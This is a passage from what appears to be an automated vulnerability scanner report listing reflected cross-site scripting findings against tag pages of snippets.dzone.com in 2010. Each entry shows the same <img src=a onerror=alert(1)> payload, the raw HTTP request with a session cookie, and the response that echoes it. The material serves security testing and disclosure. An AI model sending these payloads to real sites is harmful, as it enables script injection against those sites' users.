http://snippets.dzone.com |
| Path: |
/tag/css |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab148<img%20src%3da%20onerror%3dalert(1)>294fd9e278c was submitted in the REST URL parameter 2. This input was echoed as ab148<img src=a onerror=alert(1)>294fd9e278c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/cssab148<img%20src%3da%20onerror%3dalert(1)>294fd9e278c HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:14:43 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9430
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/cssab148%3Cimg+src%3Da+onerror%3Dalert%281%29%3E294fd9e278c">cssab148<img src=a onerror=alert(1)>294fd9e278c</a>
...[SNIP]...
|
1.15. http://snippets.dzone.com/tag/database [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/database |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 18989<img%20src%3da%20onerror%3dalert(1)>cd21ce9b064 was submitted in the REST URL parameter 2. This input was echoed as 18989<img src=a onerror=alert(1)>cd21ce9b064 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/database18989<img%20src%3da%20onerror%3dalert(1)>cd21ce9b064 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:16:23 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9445
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/database18989%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ecd21ce9b064">database18989<img src=a onerror=alert(1)>cd21ce9b064</a>
...[SNIP]...
|
1.16. http://snippets.dzone.com/tag/date [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/date |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 12a53<img%20src%3da%20onerror%3dalert(1)>a3ec426b764 was submitted in the REST URL parameter 2. This input was echoed as 12a53<img src=a onerror=alert(1)>a3ec426b764 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/date12a53<img%20src%3da%20onerror%3dalert(1)>a3ec426b764 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:14:45 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/date12a53%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea3ec426b764">date12a53<img src=a onerror=alert(1)>a3ec426b764</a>
...[SNIP]...
|
1.17. http://snippets.dzone.com/tag/duplicate [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/duplicate |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c595<img%20src%3da%20onerror%3dalert(1)>6d8739207cc was submitted in the REST URL parameter 2. This input was echoed as 5c595<img src=a onerror=alert(1)>6d8739207cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/duplicate5c595<img%20src%3da%20onerror%3dalert(1)>6d8739207cc HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:19:01 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9448
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/duplicate5c595%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6d8739207cc">duplicate5c595<img src=a onerror=alert(1)>6d8739207cc</a>
...[SNIP]...
|
1.18. http://snippets.dzone.com/tag/file [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/file |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 768e1<img%20src%3da%20onerror%3dalert(1)>f4fd9a2fec8 was submitted in the REST URL parameter 2. This input was echoed as 768e1<img src=a onerror=alert(1)>f4fd9a2fec8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/file768e1<img%20src%3da%20onerror%3dalert(1)>f4fd9a2fec8 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:14:55 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/file768e1%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef4fd9a2fec8">file768e1<img src=a onerror=alert(1)>f4fd9a2fec8</a>
...[SNIP]...
|
1.19. http://snippets.dzone.com/tag/find [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/find |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1907<img%20src%3da%20onerror%3dalert(1)>71bb048e8a2 was submitted in the REST URL parameter 2. This input was echoed as c1907<img src=a onerror=alert(1)>71bb048e8a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/findc1907<img%20src%3da%20onerror%3dalert(1)>71bb048e8a2 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:14:56 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/findc1907%3Cimg+src%3Da+onerror%3Dalert%281%29%3E71bb048e8a2">findc1907<img src=a onerror=alert(1)>71bb048e8a2</a>
...[SNIP]...
|
1.20. http://snippets.dzone.com/tag/google [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/google |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 98082<img%20src%3da%20onerror%3dalert(1)>6d2467a37e5 was submitted in the REST URL parameter 2. This input was echoed as 98082<img src=a onerror=alert(1)>6d2467a37e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/google98082<img%20src%3da%20onerror%3dalert(1)>6d2467a37e5 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:15:01 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9439
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/google98082%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6d2467a37e5">google98082<img src=a onerror=alert(1)>6d2467a37e5</a>
...[SNIP]...
|
1.21. http://snippets.dzone.com/tag/hash [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/hash |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 83315<img%20src%3da%20onerror%3dalert(1)>94a8db6da3 was submitted in the REST URL parameter 2. This input was echoed as 83315<img src=a onerror=alert(1)>94a8db6da3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/hash83315<img%20src%3da%20onerror%3dalert(1)>94a8db6da3 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:15:01 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9430
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/hash83315%3Cimg+src%3Da+onerror%3Dalert%281%29%3E94a8db6da3">hash83315<img src=a onerror=alert(1)>94a8db6da3</a>
...[SNIP]...
|
1.22. http://snippets.dzone.com/tag/html [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/html |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3d2f<img%20src%3da%20onerror%3dalert(1)>d74db0f8cb8 was submitted in the REST URL parameter 2. This input was echoed as b3d2f<img src=a onerror=alert(1)>d74db0f8cb8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/htmlb3d2f<img%20src%3da%20onerror%3dalert(1)>d74db0f8cb8 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:16:25 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/htmlb3d2f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed74db0f8cb8">htmlb3d2f<img src=a onerror=alert(1)>d74db0f8cb8</a>
...[SNIP]...
|
1.23. http://snippets.dzone.com/tag/http [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/http |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b99c4<img%20src%3da%20onerror%3dalert(1)>4c00a6b074a was submitted in the REST URL parameter 2. This input was echoed as b99c4<img src=a onerror=alert(1)>4c00a6b074a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/httpb99c4<img%20src%3da%20onerror%3dalert(1)>4c00a6b074a HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:16:04 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/httpb99c4%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4c00a6b074a">httpb99c4<img src=a onerror=alert(1)>4c00a6b074a</a>
...[SNIP]...
|
1.24. http://snippets.dzone.com/tag/id3lib [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/id3lib |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 64405<img%20src%3da%20onerror%3dalert(1)>d2ad89b85c7 was submitted in the REST URL parameter 2. This input was echoed as 64405<img src=a onerror=alert(1)>d2ad89b85c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/id3lib64405<img%20src%3da%20onerror%3dalert(1)>d2ad89b85c7 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:19:01 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9439
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/id3lib64405%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed2ad89b85c7">id3lib64405<img src=a onerror=alert(1)>d2ad89b85c7</a>
...[SNIP]...
|
1.25. http://snippets.dzone.com/tag/image [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/image |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 67d8f<img%20src%3da%20onerror%3dalert(1)>ce9bfb8491b was submitted in the REST URL parameter 2. This input was echoed as 67d8f<img src=a onerror=alert(1)>ce9bfb8491b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/image67d8f<img%20src%3da%20onerror%3dalert(1)>ce9bfb8491b HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:15:16 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9436
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/image67d8f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ece9bfb8491b">image67d8f<img src=a onerror=alert(1)>ce9bfb8491b</a>
...[SNIP]...
|
1.26. http://snippets.dzone.com/tag/java [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/java |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload de5fc<img%20src%3da%20onerror%3dalert(1)>df2c875959e was submitted in the REST URL parameter 2. This input was echoed as de5fc<img src=a onerror=alert(1)>df2c875959e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/javade5fc<img%20src%3da%20onerror%3dalert(1)>df2c875959e HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:16:02 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/javade5fc%3Cimg+src%3Da+onerror%3Dalert%281%29%3Edf2c875959e">javade5fc<img src=a onerror=alert(1)>df2c875959e</a>
...[SNIP]...
|
1.27. http://snippets.dzone.com/tag/javascript [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/javascript |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e0a4<img%20src%3da%20onerror%3dalert(1)>32c61f0c402 was submitted in the REST URL parameter 2. This input was echoed as 7e0a4<img src=a onerror=alert(1)>32c61f0c402 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/javascript7e0a4<img%20src%3da%20onerror%3dalert(1)>32c61f0c402 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:16:07 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9451
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/javascript7e0a4%3Cimg+src%3Da+onerror%3Dalert%281%29%3E32c61f0c402">javascript7e0a4<img src=a onerror=alert(1)>32c61f0c402</a>
...[SNIP]...
|
1.28. http://snippets.dzone.com/tag/jonas [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/jonas |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 46ee8<img%20src%3da%20onerror%3dalert(1)>ee88cedc77d was submitted in the REST URL parameter 2. This input was echoed as 46ee8<img src=a onerror=alert(1)>ee88cedc77d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/jonas46ee8<img%20src%3da%20onerror%3dalert(1)>ee88cedc77d HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:17:11 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9436
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/jonas46ee8%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eee88cedc77d">jonas46ee8<img src=a onerror=alert(1)>ee88cedc77d</a>
...[SNIP]...
|
1.29. http://snippets.dzone.com/tag/jsfromhell [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/jsfromhell |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65128<img%20src%3da%20onerror%3dalert(1)>fe539cf425c was submitted in the REST URL parameter 2. This input was echoed as 65128<img src=a onerror=alert(1)>fe539cf425c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/jsfromhell65128<img%20src%3da%20onerror%3dalert(1)>fe539cf425c HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:17:01 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9451
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/jsfromhell65128%3Cimg+src%3Da+onerror%3Dalert%281%29%3Efe539cf425c">jsfromhell65128<img src=a onerror=alert(1)>fe539cf425c</a>
...[SNIP]...
|
1.30. http://snippets.dzone.com/tag/linux [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/linux |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7413f<img%20src%3da%20onerror%3dalert(1)>06580895d61 was submitted in the REST URL parameter 2. This input was echoed as 7413f<img src=a onerror=alert(1)>06580895d61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/linux7413f<img%20src%3da%20onerror%3dalert(1)>06580895d61 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:17:19 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9436
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/linux7413f%3Cimg+src%3Da+onerror%3Dalert%281%29%3E06580895d61">linux7413f<img src=a onerror=alert(1)>06580895d61</a>
...[SNIP]...
|
1.31. http://snippets.dzone.com/tag/math [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
